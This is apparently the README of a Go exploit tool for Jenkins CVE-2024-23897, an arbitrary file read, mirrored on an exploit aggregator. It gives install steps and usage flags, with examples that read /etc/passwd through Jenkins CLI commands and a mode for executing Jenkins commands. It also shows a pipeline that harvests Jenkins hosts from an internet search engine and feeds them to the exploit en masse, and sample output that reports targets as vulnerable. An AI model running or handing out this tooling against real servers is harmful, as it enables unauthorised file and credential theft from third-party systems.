Share
## https://sploitus.com/exploit?id=7B65C393-F43C-5886-A5F4-C76B09C03079
<h4 align="center"> CVE-2024-23897 - Jenkins 任意文件读取 利用工具 </h4>
<p align="center">
<img src="https://img.shields.io/github/go-mod/go-version/wjlin0/CVE-2024-23897?filename=go.mod" alt="">
<a href="https://github.com/wjlin0/CVE-2024-23897/releases/"><img src="https://img.shields.io/github/release/wjlin0/CVE-2024-23897" alt=""></a> 
<a href="https://github.com/wjlin0/CVE-2024-23897" ><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/wjlin0/CVE-2024-23897"></a>
<a href="https://github.com/wjlin0/CVE-2024-23897/releases"><img src="https://img.shields.io/github/downloads/wjlin0/CVE-2024-23897/total" alt=""></a> 
<a href="https://github.com/wjlin0/CVE-2024-23897"><img src="https://img.shields.io/github/last-commit/wjlin0/CVE-2024-23897" alt=""></a> 
<a href="https://wjlin0.com/"><img src="https://img.shields.io/badge/wjlin0-blog-green" alt=""></a>
</p>

# 安装

CVE-2024-23897 需要`go 1.21`才能完成安装 执行以下命令

```shell
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
```
或者
安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_arm64.zip)

- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_amd64.zip)

- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_linux_amd64.zip)

- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_amd64.zip)

- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_386.zip)


# 使用
```shell
CVE-2024-23897 -help
```
```text
CVE-2024-23897 is a tool for scanning for CVE-2024-23897

Usage:
  CVE-2024-23897 [flags]

Flags:
INPUT:
   -url, -u string[]  URL to scan. (e.g. -u https://example.com)
   -list string[]     File containing list of URLs to scan. (e.g. -list list.txt)

CONFIG:
   -c, -command string[]           JinKens Command to run. (e.g. -c 'who-am-i')
   -a, -args string[]              JinKens Command args.
   -e, -exec                       JinKens Execute command.
   -lac, -list-available-commands  List available commands.

OUTPUT:
   -no-color  Don't Use colors in output

DEBUG:
   -debug                           Enable debugging
   -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
   -irt, -input-read-timeout value  timeout on input read (default 3m0s)
   -version                         show version of CVE-2024-23897 tool
   -header string[]                 Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or  -header header.txt)
   -no-stdin                        disable stdin processing

LIMIT:
   -timeout int          time to wait in seconds before timeout (default 10)
   -t, -thread int       Number of concurrent threads (default 30)
   -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)

UPDATE:
   -update                      Update tool
   -duc, -disable-update-check  Disable update check


Examples:
Run CVE-2024-23897 check vulnerability on a single targets
        $ CVE-2024-23897 -url https://example.com

Run CVE-2024-23897 check vulnerability on list of targets
        $ CVE-2024-23897 -list list.txt

Run CVE-2024-23897 read full file contents on a single targets
        $ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd

Run CVE-2024-23897 read available commands on a single targets
        $ CVE-2024-23897 -url https://example.com -lac

Run CVE-2024-23897 execute the JenKings command
        $ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec

Run CVE-2024-23897 check vulnerability on a single targets by proxy server
        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890

Run CVE-2024-23897 on uncovering Jenkins check vulnerability
        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

```

use pathScan to collect targets and pass them to CVE-2024-23897 via standard input

```shell
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
```
> To protect your privacy, I have deleted some outputs
```text
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
 / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / /
/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /
\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/


Jenkins 任意文件读取漏洞
						wjlin0.com

慎用。你要为自己的行为负责
开发者不承担任何责任,也不对任何误用或损坏负责.

[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd

[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body 
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests
```

# 漏洞分析
> If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.

- [Jenkins 任意文件读取漏洞分析](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html)